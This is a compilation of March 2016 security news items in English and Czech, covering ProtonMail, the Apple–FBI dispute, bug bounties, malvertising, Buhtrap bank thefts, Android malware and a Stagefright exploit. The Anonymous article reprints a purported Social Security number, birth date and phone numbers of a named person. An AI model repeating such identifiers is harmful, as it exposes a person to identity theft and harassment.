Although, there are a number of encryption tools that offers encrypted email service to ensure that no one can see what you are sending to someone else.
One such tool to send encrypted emails is PGP (Pretty Good Privacy), an encryption tool designed to protect users’ emails from snooping.
However, setting up a PGP Environment for non-tech users is quite a difficult task, so more than 97% of the Internet users, including government officials, are still communicating via unencrypted email services i.e. Gmail, Yahoo, and other.
But here is good news for all those non-techies, but privacy-conscious Internet users, who wish to use encrypted e-mail communication without any hassle.
Solution — ProtonMail.
ProtonMail, developed by CERN and MIT scientists, is a free, open source and end-to-end encrypted email service that offers the simplest and best way to maintain secure communications to keep user's personal data secure.
ProtonMail Now Available for iOS and Android Users
secure-encrypted-email-service-providers
ProtonMail has been invite-only since 2014, but now the email service has made itself available to everyone and launched new mobile apps.
If you opt for a free account, you'll get all of the basic features including:
A smart-looking app to access your end-to-end encrypted emails easily
500MB of storage capacity
Sending 150 Messages per day
Two-factor authentication to access your encrypted email inbox
To increase storage capacity, you can purchase ProtonMail's paid accounts.
NOTE – Always remember your password to decrypt the email inbox. Once forgot, you would no longer retrieve your encrypted emails.
Key Features:
secure-encrypted-email-service-providers-security
Even if someone intercepts your communication, he/she can not read your conversations because all emails you send or receive with other ProtonMail users are automatically encrypted end-to-end by the service.
In addition, for communicating with non-ProtonMail email addresses i.e. Gmail users, all you need to do is:
Create a message
Just click the encryption button
Set a random password
Once done, your encrypted email recipient will get a link to the message with a prompt to enter his/her same password in order to read it.
Another friendly feature that ProtonMail offers is Self-destructing emails. All you need to do is set an expiration date for an encrypted email you send, and it will get self-deleted from the recipient’s inbox once the date arrives.
Why ProtonMail won't have to comply with American Laws?
In a previous article, I explained that ProtonMail is based in Switzerland, so it won't have to comply with American courts’ demands to provide users data.
In worst case, if a Swiss court ordered ProtonMail to provide data, they will get only the heaps of encrypted data as the company doesn’t store the encryption keys.
ProtonMail has gained an enormous amount of popularity during its developing stages.
ProtonMail encrypts the data on the browser before it communicates with the server, therefore only encrypted data is stored in the email service servers, making it significantly more secure for those looking for an extra layer of privacy.
Feel free to email our team at thehackernews@protonmail.com.


FBI by mohla špehovat lidi pomocí kamery v mobilu, varuje Apple

19.3.2016 Hrozby
O sporu mezi společností Apple a vyšetřovateli z FBI, který se týká odblokování iPhonu zabijáka ze San Bernardina, bude už příští týden rozhodovat soud v USA. Viceprezident počítačového gigantu pro software a služby Eddy Cue nyní upozornil, že konečný verdikt ve prospěch FBI by mohl vytvořit velmi nebezpečný precedens, který by mohl přinést například špehování lidí na dálku pomocí kamery v mobilu.
„Když nás donutí udělat nový systém se ‚zadními vrátky‘, jak to bude pokračovat dál?,“ prohlásil Cue podle serveru Apple Insider.

Bojí se především toho, že se budou nároky stupňovat. „Pro příklad, jednou po nás FBI bude chtít, abychom zpřístupnili fotoaparát v telefonu či mikrofon. To jsou věci, které teď dělat prostě nemůžeme,“ vysvětlil viceprezident Applu, co by mohlo přinést rozhodnutí soudu.

Celý spor se rozhořel kvůli tomu, že se vyšetřovatelům z FBI nepodařilo dostat do uzamčeného iPhonu islámského radikála. Ten měl svůj iPhone nastavený tak, aby se po zadání deseti nesprávných přístupových hesel automaticky vymazal.

Nejde jen o zabijákův iPhone
Právě kvůli neúspěchu vyšetřovatelů soud společnosti Apple nařídil, aby tuto funkci vypnula. Vedení amerického počítačového gigantu to však odmítlo s tím, že to technicky není možné. Jedinou cestou, jak iPhone zpřístupnit, je údajně vytvoření „zadních vrátek“ do operačního systému iOS. Ten využívají právě chytré telefony iPhone a počítačové tablety iPad.

To ale šéf Applu Tim Cook odmítá, protože se bojí případného zneužití. Implementací takového nástroje do zmiňované mobilní platformy by totiž byla FBI schopna obejít zabezpečení prakticky jakéhokoliv iPhonu nebo iPadu v budoucnosti.

Na začátku března se totiž ukázalo, že FBI nejde pouze o zabijákův iPhone. Jen od loňského října chtěla odemknout celkem devět zařízení. [celá zpráva]

FBI chce zdrojový kód systému
FBI se nyní snaží prostřednictvím soudu vedení Applu donutit, aby „začalo spolupracovat“. V opačném případě chtějí dosáhnout vyšetřovatelé toho, aby jim musel americký počítačový gigant vydat kompletní zdrojový kód systému. S jeho pomocí by se totiž patrně také do zabijákova iPhonu dostali.

Cook se kvůli celému sporu dokonce již obrátil na prezidenta USA Baracka Obamu. S jeho pomocí by se chtěl snažit prosadit vytvoření speciálního výboru, který by se problematikou šifrování mobilů zabýval.

Na jeho žádost však úřady zatím neodpověděly. Není tedy jasné, zda Cooka Obama přijme.


Ever Wondered How Facebook Decides — How much Bounty Should be Paid?
18.3.2016 Social Site
Facebook pays Millions of dollars every year to researchers and white hat hackers from all around the world to stamp out security holes in its products and infrastructure under its Bug Bounty Program.
Facebook recognizes and rewards bug hunters to encourage more people to help the company keep Facebook users safe and secure from outside entities, malicious hackers or others.
Recently, the social media giant revealed that India is on top of all countries to report the maximum number of vulnerabilities or security holes in the Facebook platform as well as holds the top position in the country receiving the most bug bounties paid.
"India is home to the largest population of security researchers participating in the Facebook bug bounty program since its inception in 2011. The country also holds the top spot for most bounties paid," Adam Ruddermann, Facebook’s technical program manager notes.
If you are one of the Facebook’s bug hunters, you might be aware of the fact that reporting same type of flaw (say, Cross-site Scripting or XSS) in Facebook would not make one eligible for the same bounty.
Do you ever wondered why? And How Facebook decides the Bounty amount?
Well, the procedure exactly works in the same way The Hacker News team decides which news to be covered first and which is not at all i.e. based on the risks to the end-users.
Recently, Facebook’s bug bounty team explained how they calculate bounties.
How Facebook Calculates Bug Bounties?
Facebook calculates bounties, of course, based on Risk to end-users. The company offers a maximum reward of USD$20,000 and a minimum of USD$500.
The bugs that allow someone to access private Facebook data, delete Facebook data, modify an account and run JavaScript under facebook.com are considered as high-impact vulnerabilities that directly affects end users, so are maximum paid bugs.
"The security community in India is strong and growing every day," Facebook says. "India has long topped the list of 127 countries whose researchers contribute to our bug bounty program."
Here’s the Procedure Facebook Security team follows:
Step 1: The Facebook Bug Bounty team first looks at the potential impact of a vulnerability reported.
Step 2: Engineers at Facebook then calculates the difficulty or easiness of exploiting a particular vulnerability, whether it’s high-severity, as well as the kind of resources or technical skills a successful attack would require.
Step 3: The team then looks at whether any existing features can already mitigate the issue, for example, an implementation of rate-limiting mechanism to prevent brute-force attacks.
Step 4: Sometimes bug hunters report bugs that are actually Facebook features designed to provide users a better experience on the social media platform. These reports are less considered as eligible until they pose any threat.
Based upon the aforementioned steps, Facebook decides a base payout for each eligible vulnerability report.
The bounty amount can change as the risk landscape evolves, like a bug that leads to more bugs get bigger payouts.
The team also reserves an option to award security researchers and white hat hackers more than the base amount if the report itself demonstrates a high level of clarity, sophistication, and detail.
Example — Bug Bounties Paid by Facebook
facebook-bug
Earlier this month, Anand Prakash, 22, of India was awarded $15,000 (roughly Rs. 10 Lakhs) for reporting a Password Reset Vulnerability that could allow attackers to hack any Facebook account by resetting its password via endless brute force of a 6-digit code.
Have you ever wish to delete any photo from Facebook that you didn't like but posted by someone else? Believe me — It was possible, but until last year, when two independent India security researchers reported two separate vulnerabilities to Facebook and awarded $12,500 each.
Do you know what’s the highest bug bounty ever paid by Facebook? That’s $33,500 to a Brazilian hacker who managed to hack into the Facebook server using a remote-code execution vulnerability.
There was another interesting bug in Facebook that received the highest attention, but no bounty was paid.
Yes, I am talking about Palestinian Hacker, 'Khalil Shreateh', who posted vulnerability details on Facebook CEO Mark Zuckerberg’s wall to prove his point, after Facebook Security Team failed to recognize his critical vulnerability thrice.
Unfortunately, Khalil did not receive any bounty for not following the disclosure guidelines correctly and failed to clarify the vulnerability details to Facebook Security Team.
Do you want to know how to earn high bounties? Find and Report high-severity bugs.
"The most important factor for getting the maximum bounty possible is to focus on high-risk vulnerabilities, specifically those with widespread impact," Facebook says. "So, if you're looking to maximize your bounties, focus on quality over quantity."
Bug Bounty programs have widely been used by a large number of prominent technology companies including Google, Facebook and PayPal, for which Bug hunters play a vital role in security their users’ online accounts.
Bug bounties and disclosure programs encourage researchers and hackers to report responsibly vulnerabilities to the affected companies rather than exploiting them to compromise its users’ security, which may also affect company's reputation.


Anonymous claims they Hacked Donald Trump ...Really?
18.3.2016 Hacking

The 'Hacktivist' collective group Anonymous claimed to have leaked personal details of the controversial US presidential candidate Donald Trump, including his Mobile Phone Number and Social Security Number (SSN).
Donald Trump
SSN: 086-38-5955
DOB: 06/14/1946
Phone Number: 212-832-2000
Cell/Mobile Phone Number: (917) 756-8000
The hacktivist group has declared war against Trump under a campaign with the hashtag #OpWhiteRose.
The White Rose Society was a non-violent resistance group in Nazi, Germany and was known for its anti-Nazi pamphlets and graffiti during World War II.
Anonymous posted a YouTube video Thursday afternoon in which a man in a Guy Fawkes mask says:
"Donald Trump has set his ambitions on the White House in order to promote an agenda of fascism and xenophobia as well as the religious persecution of Muslims through totalitarian policies.
He has proposed targeting family members of suspected terrorists for assassination, even while acknowledging they are innocent. It would only lead to more violence from those whose families were killed by the Trump regime.
Donald Trump is an enemy of the constitution and the natural rights it enshrines. We call on all of you and millions of others to take action against Donald Trump."

The hacker collective group also released what it claimed was Trump's personal details, including cell phone number and Social Security number.
Besides his personal details, the group also released Trump’s public information including his birth date, children’s names, and company address in addition to the identities of his agent and lawyer.
However, most of the information provided by Anonymous has been circulating on the Internet since at least late last year, including his New York cell phone number and an address on 5th Avenue in Manhattan.
In response to the video, Trump's campaign has issued the following statement:
"The government and law enforcement authorities are seeking the arrest of the people responsible for attempting to illegally hack Mr. Trump's accounts and telephone information."
Soon after posting the video, Anonymous issued a follow-up tweet, saying "Seems to be outdated information, take it with a grain of salt."
This is not the first time the group has declared war against Trump. Last December, Anonymous declared war against Trump following his radical speech stating he wanted to ban Muslims from entering the United States.


Malvertising Campaign Hits Top Websites to Spread Ransomware
18.3.2016 Virus
Malvertising Campaign Hits Top Websites to Spread Ransomware
Hackers are always in search for an elite method to create loopholes in the cyberspace to implement the dark rules in the form of vulnerability exploitation.
Top Trustworthy sites such as The New York Times, BBC, MSN, AOL and many more are on the verge of losing their face value as a malwertized advertisement campaign are looming around the websites, according to SpiderLabs.
Here's what Happens to Users when Clicking Ads on these Big Brand Sites:
The advertisements on the legit sites trick users into clicking on it, making them believe that these circulated ads come from a trusted networks.
Once clicked, the malicious Ad redirects the user to a malicious website that hosts Angler Exploit Kit (AEK) to infect visitors by installing malware and ransomware on their computer.
Angler Exploit Kit includes many malicious hacking tools and zero-day exploits that let hackers execute drive-by attacks on visitors' computers.
In this case, the Angler kit scans for the vulnerable PCs and loads Bedep Trojan and TeslaCrypt Ransomware, opening doors for hackers to further install a variety of malicious programs.
Buying Media-Related Domains to Spread Malicious Campaigns
While conducting the background check, the security firm discovered that cyber criminals behind this advertising campaign made use of an expired website domain of Brentsmedia, an online marketing solution who discontinued their service earlier 2016.
According to the web registrar records, Brentsmedia's domain was purchased by Pavel G Ashtahov on March 6th, the day just before the malvertising campaign kickstarted.
Malvertising Campaign Hits Top Websites Worldwide to Spread Ransomware
Detailed analysis of this mischievous Ad campaign revealed that when a user tends to click on the malwertized Ad, it triggers a JSON file (Javascript Object Notation), which contains a list of security products for cross checking their presence in the victim's system.
If any of the pre-defined products found installed, the malvertising Ads avoid loading the malicious payload to evade the detection by antivirus firms that could block the campaign if detected.
But if not present, it will carry out the exploitation in a stealth mode, ultimately redirecting the user to the malicious page.
The Intensity of the Malvertising!
According to the researchers telemetry, these malicious Ads were delivered through two affiliate networks namely Adnxs, which has already resolved the issue, and Taggify, which has not paid any attention to the seriousness of the problem.
Two more expired media-related domains exhibiting the same characteristics as brentsmedia[.]com: "envangmedia[.]com" and "markets.shangjiamedia[.]com", shows that another similarly named domain has already been registered.
So there might be a possibility of hijacking "media" related branded domains for running malvertising campaigns, as a new generation threat to the global leaders.


Buhtrap group stole tens of millions of dollars from Russian banks
18.3.2016 Incindent

From August 2015 to February 2016 Buhtrap group managed to conduct 13 successful attacks against Russian banks for a total amount of $25.7 mln.
Since August of 2015, the Buhtrap group has conducted 13 successful attacks against financial institutions stealing more than ₽1.86 billion RUB ($27.4M USD). In April 2015, ESET discovered a malware campaign dubbed Operation Buhtrap, a conjunction of the Russian word for accountant “Buhgalter” and the English word “trap”. So far Buhtrap has not been seen anywhere else in the wild, 88 percent of targets have been in Russia and ten percent in Ukraine. Analysts have also likened the campaign to the Anunak/Carbanak campaign, which also targeted Russian and Ukrainian Banks.

The modus operandi of these particular cybercriminals is usually associated with targeted attacks rather than cyber fraud, which make this move to financial crime unusual and effective.

In the last wave of, the attackers hit Russian banks by pretending to be FinCERT, a center established by the Russian Central Bank for dealing with cyber-attacks in Russia’s financial sector.

According to a report released by the security firm Group-IB, Buhtrap has been active since 2014, despite their first attacks against financial institutions were only detected in August 2015. Earlier, the group had only focused on targeting banking clients. At the moment, the group is known to target Russian and Ukrainian banks, below the timeline of the attacks published by Group-IB:

Buhtrap group timeline attacks

The Buhtrap timeline is a sequence of successful attacks, in August 2015 the hackers stole ₽25.6 million RUB ($375,617 USD), two months later a new campaign resulted in the losses of ₽99 million RUB ($1.4 million USD).

In November 2015, the group raked ₽75 million RUB ($1.1 million USD) with two distinct campaigns against two banks. In December the group reached a peak in its activity targeting 5 banks and taking down ₽571 million RUB ($8.3 million USD). They also conducted two successful attacks in January and two more a month later. In all, the group has stolen ₽1.86 billion RUB ($27.4M USD) from banks in Russia

The activities continued in January and February stealing dozen million dollars from banks in Russia.

In February 2016, a developer for Buhtrap leaked the complete source code for the malware used by the group because he wasn’t paid by the gang. Experts who have analyzed it discovered that the code is related to an earlier revision and not to the one used in the recent attacks.

“Earlier, the group had only focused on targeting banking clients. At the moment, the group is known to target Russian and Ukrainian banks.” states the report.

“In many respects, this group’s activity has led to the current situation where attacks against Russian banks causing direct losses in the hundreds of millions of rubles are no longer taken as something unusual,”

The tactic used by the Buhtrap group is consolidated, the hackers register typo domains or domains that are familiar to the victim, and from there they rent servers where mail servers were set up to send phishing emails on behalf of the legitimate company avoiding being filtered as spam.

The group used a custom malware which is able to detect security software and other defensive solutions. The malware uses to track every banking operation made by the victims, the malicious code notice these operations, it downloads a legitimate remote access tool (LiteManager) which is used to carry on fraudulent transfer orders.

What to expect in the next months?

The experts have no doubt, the group will continue its activity, likely improving its TTPs, researchers at Group-IB fears that the public availability of the gang’s malware may trigger the number of campaigns against banks conducted by other criminal organizations.

“The published source codes are active. Their wide distribution may trigger the increase in the number of attacks using this malware conducted by other groups. The builder interface is presented below.” states the report.

Let me suggest to give a look at the interesting report published by Group-IB, it is full of precious information on the Buhtrap group, including indicators of compromise.


DB of the Kinoptic iOS app abandoned online with 198,000 records
18.3.2016 iOS

Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.
The security researcher Chris Vickery has discovered a database belonging to an abandoned iOS app, the Kinoptic iOS app, that is exposing on the Internet personal details of over 198,000 users.

The Kinoptic iOS app allowed Apple users to create cinematic slideshows of their photos, animate smaller portions of one picture and, of course, to share it through social media platforms.

“Kinotopic allows you to create, share, and store short video moments and make them more expressive – in the form of animated pictures and cinemagraphs.” states the app description.

The Kinoptic iOS app was present on the official App store from 2012 to 2015, its website was closed early 2016.

Chris Vickery is popular for its researches on Intente-exposed MongoDB databases, he discovered archives exposing the personal details of hundred millions U.S. voters and recently a misconfigured MongoDB installation behind a Microsoft’s career portal that exposed visitors to attacks.

Vickery explained confirmed that the database behind the Kinoptic iOS app remained online, despite the application was removed from the official Apple store.the disconcerting aspect of the story is that the developers of the Kinoptic iOS app abandoned their service, leaving the data exposed on the Internet … a present for crooks that could use them to target the unaware users.

Kinoptic iOS app

The data is available without authentication and includes usernames, email addresses, and hashed passwords, along with other details stored in profiles managed by the Kinoptic iOS app.

Vickery tried to report the issue to both Kinoptic developers and Apple. The Kinoptic team has never replied to the expert, meanwhile the Apple’s reply was:

“Chris, if you believe that this issue affects the security of an iOS device or the iTunes Store, you may report it to product-security@apple.com. […]

On the other hand, if this security issue only affects the application itself, I’m afraid you will need to continue getting in touch with the app developer for assistance.”

This means that the data will continue to stay online until the server or the database is shut down.

Of course, if you have used in the past the Kinoptic app you need to change the password as soon as possible.


New Android Gmobi adware found in firmware and popular apps
18.3.2016 Android

Malware researchers at the Dr Web firm have found an Android malware named Gmobi specifically designed to spread as a software development kit (SDK).
Malware researchers at security firm Dr.Web have detected a new strain of malware that was specifically designed to spread as a software development kit (SDK) used by software developers and mobile device manufacturers. The malware, named Android.Gmobi.1, has been found in several legitimate applications developed by well-known companies, as well as in firmware for nearly 40 mobile devices.

“This Trojan, which was named Android.Gmobi.1, is designed as a specialized program package (the SDK platform) usually used either by mobile device manufacturers or by software developers to expand functionality of Android applications. In particular, this module is able to remotely update the operating system, collect information, display notifications (including advertising ones), and make mobile payments.” states the analysis published by the company.

The malware acts as an information stealer, it collects user and device data and send them back to the C&C server. Gmobi collects user emails, device info, roaming availability status, GPS or mobile network coordinates, whether the Google Play app that installed on the device.

Gmobi collects the following information and sends it to the C&C server: user emails, device info, roaming availability status, device location and mobile network coordinates, whether the presence of a Google Play application on the device.

The malware belongs to the adware category, once the C&C server has received the data from the device it can instruct the Gmobi in showing ads in specific positions of the device. The bad news is that operators behind Gmobi can also instruct the malware to download and install malicious APK files using a standard system dialog.

android gmobi adware

The experts highlighted that the Gmobi adware can install the APK files in a covert way only if the malware has the necessary privileges.

The server replies with an encrypted JSON (Java Script Object Notification) object that can contain the following commands:

Update the database with information about the advertisement to display.
Create an advertising shortcut on the home screen.
Display an advertising notification.
Display a notification tapping which will result in launch of an installed application.
Automatically download and install APK files using a standard system dialog. A covert installation of these files is performed only if the Trojan has necessary privileges.
The researchers have detected Gmobi in Trend Micro’s Dr. Safety and Dr. Booster apps, and the ASUS WebStorage apps. The Gmobi variant that was discovered in the software of the Trend Micro firm only collected information from the Android devices and sent it to a remote server.

Dr.Web reported the issue to all the impacted companies, Trend Micro has promptly released a new version of the infected apps.

“If your device’s firmware is infected by this Trojan, the malware cannot be removed by the anti-virus without root privileges. However, even if root privileges are gained, there is a high risk of making the device non-operational because the Trojan can be incorporated into some critical system application. Therefore, the safest solution for victims ofAndroid.Gmobi.1 is to contact the manufacturer of the device and ask them to release a firmware update without the Trojan.” concludes Dr Web.


Microsoft dá sbohem šifře RC4, která chránila HTTPS a Wi-Fi
18.3.2016
Zabezpečení

Microsoft oznámil , že v dohledné době výchozím odstraní podporu pro RC4 ve svých internetových prohlížečích Edge a Internet Explorer (11). Jde o algoritmus, který se využívá například při šifrovaném přenosu u webových stránek či při zabezpečení bezdrátových sítí. Historie šifry RC4 sahá ještě do roku 1987.

RC4

Šifra široce používaná u běžně používaných protokolů SSL/TLS pro HTTPS nebo WEP a WPA u Wi-Fi sítí. Byla oblíbená pro svou rychlost, jednoduchost a snadnou implementaci. Aktuálně už je ale překonána modernějšími alternativami.
Změna se odehraje v rámci kumulativních bezpečnostních aktualizací, které budou vydány příští měsíc, konkrétně 12. dubna (čili společně s dalšími bezpečnostními záplatami pro jiné produkty).

Microsoft tím plní závazek, o kterém informoval ještě loni. Zároveň následuje konkurenční produkty jako Google Chrome, Mozilla Firefox nebo Opera. Tyto prohlížeče již podporu RC4 zakázaly v předchozích aktualizacích.

Jelikož se většina moderních webových služeb i prohlížečů od RC4 už odklonila, v principu se běžní uživatelé nemusí při surfování na zabezpečených webech obávat nějakého omezení.


FBI varuje – chytrá auta se mohou lehce stát cílem hackerů

18.3.2016 Hacking

Odpojené brzdy, vypnutá světla nebo zaseklý plyn. Noční můry řidičů už nemusí mít na svědomí jen únava materiálu, ale i hackeři.
Hacknutý firemní systém je sice nepříjemnost, ale nemusí jít v každém případě o život. V případě hacknutého auta je to horší. Americké úřady vydaly varování před rostoucím nebezpečím útoků na kamiony nebo osobní auta prostřednictvím internetu.

„Moderní auta umožňují připojit různá zařízení, která přináší třeba ekonomičtější provoz nebo větší pohodlí za jízdy. Ale za cenu toho, že auto připojené k internet představuje větší riziko,“ tvrdí zpráva.

Podle FBI by se měli majitelé připojených aut ke svým vozidlům chovat jako k počítačům – tedy aktualizovat software a nevynechávat případné svolávání automobilkou k fyzickému záplatování objevených bezpečnostních děr. Samozřejmě se nedoporučují ani neautorizované úpravy systému nebo používání neprověřených gadgetů.

Většina tipů vyplývá z loňských zkušeností, kdy hackeři Charlie Miller a Chris Valasek hackli v červenci systém Chrysleru a pro automobilku to znamenalo svolávání 1,4 milionu aut. Jen o měsíc později vědci z University of California předvedli, jak může být jednoduše hacknuta Corvetta. A to prostřednictvím donglu, který svým klientům do aut poskytuje pojišťovna.

„V textu není moc nových informací. Navíc je to s dost velkým zpožděním. Každopádně i tak se to bude hodit. Lidé berou FBI vážně,“ tvrdí časopisu Wired hacker Chris Valasek.

Podle hackera se teď mohou úřady těšit na záplavu oznámení o hacknutí auta. Podobně se to totiž stalo loni jim. „Jsme rádi, že to po nás FBI převezme,“ dodává.

Připojená auta se stala letos jedním z větších témat i na barcelonském veletrhu MWC. Kromě Samsungu se tam s novinkou pochlubil i T-Mobile. Operátor v autech vidí především další zařízení, do kterých může zapíchnout své datové SIM karty.


Trojský kůň Marcher pro Android se šíří přes pornografické weby

18.3.2016 Mobilní

Trojan Marcher využívá zájem o pornografii a proniká do mobilů zájemců o porno, aby je připravil o peníze. Musí mu ale sami uvolnit cestu.
Jak se může do telefonu s Androidem dostat trojský kůň? Většinou tak, že si ho tam dobrovolně pořídíte – což je nakonec i případ Marcheru, který využívá pornografické weby. Uživatelům porno webu pošle odkaz na stažení aplikace e-mailem nebo v SMS. Maskuje se za aktualizaci Adobe Flash Player, která má být nutná pro přístup k žádanému pornu.

Právě vydávání se za Flash nebo aktualizaci Flashe je jednou z nejčastějších cest, jak se viry a malware dostávají i do klasického počítače. V mobilu to mají těžší – je totiž nutné povolit instalaci aplikací z jiných míst než Google Play, ale porna chtiví jedinci nejspíš i tuto překážku snadno překonají. Po instalaci získá trojan správcovská práva (uživatel mu je pochopitelně udělí) a uživateli je „poslána“ MMS s odkazem naX-Video aplikaci na Google Play – ta nic škodlivého neobsahuje, je pravděpodobně použita jenom pro vyvolání zdání realističnosti.

Trojan se poté rovnou zeptá na platební údaje a tváří se jako formulář z Google Play. V některých případech si je dokáže získat z dalších platebních aplikací, které se v telefonu mohou nacházet. Umí vytvářet i falešné přihlašovací stránky bank (použije k tomu informace o tom, jaké máte v mobilu bankovní aplikace) a je vybaven řadou dalších vychytávek.

Zscaller v Android Marcher now marching via porn sites uvádějí, že Marcher vznikl už někdy v roce 2013 a původně si vystačil pouze s imitováním Google Play pro získání platebních údajů. Později přidal vytváření falešných přihlašovacích stránek bank. Pokud vás zajímají další informace o tomto trojském koni, zkuste Android.Trojan.Marcher od PhishLabs. Při čtení narazíte i na to, že mezi napadenými zeměmi je uvedená Česká republika s 11 % podílem.

Jednu věc je vhodné zdůraznit: pokud si v Androidu nepovolíte instalaci z jiných míst než z Google Play, tak se do vašeho telefonu nemá podobný virus jak dostat.

Z Google Play obvykle nic chytit nemůžete, X-Video na Google Play nic škodlivého neobsahuje. Do telefonu (či tabletu) se „aktualizace Adobe Flash Player“ dostane jedině tak, že si stáhnete apk odněkud odjinud a poté provedete sami instalaci.


Android Stagefright Exploit, Millions devices open to 10-seconds hack
18.3.2016 Android

Millions of Android devices are open to hacking attacks due to the newly disclosed Android Stagefright Exploit that hack a smartphone in 10 seconds.
New problems for Android users, security experts at software research firm NorthBit have developed an exploit for a Stagefright vulnerability affecting Google’s operating system.

Millions of Android devices are open to hacking attacks due to the newly disclosed Android Stagefright Exploit that could allow attackers to hack a smartphone in 10 seconds.

The attacker just needs to trick users into visiting a specifically crafted web page that includes a malicious multimedia file.

The researchers at NorthBit have dubbed the Android Stagefright Exploit Metaphor, they published a detailed analysis of the attack in a paper entitled “Metaphor A (real) real­life Stagefright exploit.”

The researchers have published a proof-of-concept video that shows how they hacked an Android Nexus 5 device using their Metaphor exploit in just 10 seconds. They also demonstrated that the Android Stagefright Exploit Metaphor works against other mobile devices, including Samsung Galaxy S5, LG G3 and HTC One smartphones.

“Although the bug exists in many versions (nearly a 1,000,000,000 devices) it was claimed impractical to exploit in­the­wild, mainly due to the implementation of exploit mitigations in newer Android versions, specifically ASLR.” states the paper.
The Android Stagefright Exploit works on Android versions 2.2 ­to 4.0 and 5.0 to 5.1 while bypassing ASLR on Android versions 5.0 to 5.1, as version 2.2 to version 4.0 do not implement ASLR. Other Android versions are not affected by the new Stagefright exploit.

The Stagefright was first discovered in July 2015, experts at security firm Zimperium announced the flaw is the worst Android vulnerability flaw in the mobile OS history.
The Stagefright flaw affects a media library app that is used for by Android to process Stagefright media files. According to the experts at Zimperium the media library is affected by several vulnerabilities.
Joshua Drake from Zimperium discovered seven critical vulnerabilities in the native media playback engine called Stagefright, the expert defined the Stagefright flaw the “Mother of all Android Vulnerabilities.”

The attackers can exploit the vulnerability by sending a single multimedia text message to an unpatched Android device. Despite Google has already issued a patch and has sent out to it to the company’s partners, but most manufacturers haven’t already distributed the patch to their customers exposing them to cyber attack.

In September 2015, experts at Zimperium released a Stagefright exploit, demonstrating how to trigger the Remote Code Execution (RCE). The researchers implemented the Stagefright Exploit in python by creating an MP4 exploiting the ‘stsc’ vulnerability, aka Stagefright vulnerability.
Stagefright Exploit
In October 2015, experts at Zimperium discovered that a billion Android phones were vulnerable to new Stagefright vulnerabilities, dubbed Stagefright 2.0 that could allow attackers to execute malicious code on the targeted device.
The researchers discovered two bugs that are triggered when processing specially crafted MP3 audio or MP4 video files.
The hacking procedure described by the researchers at NorthBit is composed of the following steps:
Tricking a victim into visiting a malicious page containing a video file that crashes the media server to reset its internal state.
Once the media server restarts, the JavaScript hosted on the web page sends information about the device to the attacker’s server.
The server reply with a custom generated video file to the affected device, exploiting the Stagefright bug to reveal more info about the device’s internal state.
This information is also sent back to the attacker’s server to craft another video file that embeds a malicious payload that allows gaining the control of the mobile device.


Přes kompromitované inzertní sítě a velké weby v USA se šířil ransomware

17.3.2016 Viry

Útočné reklamy se dostaly i na ty největší a nejnavštěvovanější americké weby. Útočníci využili chyby ve Flashi, Silverlightu a dalším softwaru.
Pokud jste se v posledních dnech pohybovali na velkých a známých (zahraničních) webech, je velmi pravděpodobné, že jste se mohli setkat s reklamami, které ve skutečnosti zkoušejí, jestli se není možné dostat do vašeho počítače.

Využívají k tomu děravý Flash, Silverlight, Javu a další software v prohlížeči, u kterého jsou známé využitelné zranitelnosti. Po získání přístupu do počítače nasadí trojského koně a ransomware, který zašifruje data a za jejich odemčení požaduje zaplacení výkupného.

Nakažené reklamy se v posledních dnech objevily i v Česku – viz Podvodné reklamy straší virovou nákazou, šíří je i reklamní síť Googlu.

Trend Micro v Massive Malvertising Campaign in US Leads to Angler Exploit Kit/BEDEP uvádí, že útočícím kódem je starý známý Angler a samotná kampaň by měla cílit pouze na uživatele v USA. Výsledkem útoku je stažení backdooru známého pod názvem BEDEP a malwaru, který Trend Micro označuje jako TROJAN_AVRECON. Trustwave v Angler Takes Malvertising to New Heights informace potvrzuje a doplňuje některá další konkrétní fakta.

Zajímavé může být například to, že samotný útočný JavaScript má přes 12 tisíc řádek kódu a je samozřejmě napsán tak, aby bylo velmi obtížné zjistit, co vlastně dělá. Snaží se mimo jiné vyhýbat počítačům, které jsou chráněny některými antiviry či antimalware programy. Napadené inzertní sítě jsou, podle Trustwave, hlavně adnxs a taggify, přičemž pouze první z nich se k problému postavila čelem a nabídla rychlé řešení.

Malwarebytes v Large Angler Malvertising Campaign Hits Top Publishers doplňuje poměrně užitečný seznam webů, na kterých se útočné inzeráty objevily – zahrnuje MSN.com, NYTimes.com, BBC.com, AOL.COM či NewsWeek.com (ale i řadu dalších), které v návštěvnosti dosahují i stovky milionů návštěvníků měsíčně. Napadené inzertní sítě byly klasicky využity k tomu, že se reklamy dostaly do velkých inzertních sítí, včetně Googlu, AppNexus, AOL či Rubicon.

Malwarebytes také doplňují, že původní kit pro napadení byl RIG, teprve v neděli byl nahrazen Anglerem, do kterého byla doplněna i čerstvě objevená zranitelnost v Silverlightu.


Šifrovaný ProtonMail už je dostupný pro všechny. K dispozici jsou i aplikace pro smartphony
17.3.2016
Zabezpečení

ProtonMail vzniknul na začátku loňského roku jako výsledek zvýšené poptávky po zabezpečené komunikaci. Vývojáři, kteří mají pracovní zkušenosti ze Švýcarského CERNu, šifrují text zpráv pomocí OpenPGP a internetem tedy putuje jako nesmyslná změť znaků. Dekóduje se opět až na konci u příjemce. ProtonMail se nyní dostává z fáze beta do běžného provozu a zaregistrovat si účet může kdokoliv.

obrázek 188.jpg
Schránka ProtonMailu vypadá na první pohled jako kterýkoliv jiný webmail. Zprávy jsou však zašifrovány jak při odesílání, tak při ukládání na server provozovatele

Registrace pro uživatele, kteří nebyli součástí beta testování se otevřela dnes ve 12.30 a zároveň s tím zamířily do App Store a Google Play aplikace pro mobilní zařízení. V blogpostu, kterým zakladatel společnosti oznámil ostrý start, zdůraznil vzrůstající poptávku po takto zabezpečené komunikaci i v souvislosti s aktuální kauzou, jež se kolem šifrování rozjela.

Na startu ProtonMailu stála úspěšná crowdfundingová kampaň, která tvůrcům přinesla 550 000 dolarů, tedy asi 13 milionů korun. Aktuálně je novým uživatelům k dispozici schránka s kapacitou 500 MB, přičemž rozšíření probíhá pomocí některého z placených účtů. Za 5 GB navíc zaplatíte 5 euro měsíčně a získáte možnost denně odeslat až 1 000 zpráv. V základní neplacené verzi je limit nastaven na 150 zpráv. Za příplatek si lze pořídit vlastní domény s několika aliasy nebo možnost třídit zprávy pomocí více štítků – v bezplatné verzi jich je 20.

Při registraci vás čeká volba běžného přihlašovacího hesla a potom druhého, s jehož pomocí jsou zprávy šifrovány. První z nich lze resetovat v případě, že k účtu přiřadíte ještě jeden běžný e-mail. Šifrovací heslo však není možné žádným způsobem obnovit a k předchozí poště se při jeho ztrátě již nedostanete.


Biohacking - Člověk 2.0

